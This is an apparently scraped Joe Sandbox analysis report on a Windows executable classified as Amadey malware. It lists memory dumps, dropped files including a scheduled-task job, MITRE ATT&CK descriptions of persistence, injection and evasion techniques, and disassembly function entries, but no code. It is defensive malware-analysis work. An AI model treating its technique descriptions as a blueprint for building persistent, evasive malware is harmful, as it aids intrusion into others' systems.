Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#i$P#i
API String ID: 2659868963-1653140521
Opcode ID: d951a50c267069fba03e27008f9e6e82f4bd9ad6aaba1d37c02d8b0cf13b26e9
Instruction ID: f840145ac6f1e9b1f8eb9fb104a4088243594ac634529d59fb51109788ef4c5a
Opcode Fuzzy Hash: d951a50c267069fba03e27008f9e6e82f4bd9ad6aaba1d37c02d8b0cf13b26e9
Instruction Fuzzy Hash: 5FF08271D1124D9BCB14DFA8D841A9EBBF6AF55304F1082AEE44467200EA705A94CB99

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 11NdzR12PS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

C:\Windows\Tasks\explorti.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
11NdzR12PS.exe

Function 0069BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Function 00695DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00697D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 006C6E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 006CD4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
COMMONLIBRARYCODE

Function 006982B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 006C6C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 006C6F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 006CD6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Function 006A6AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON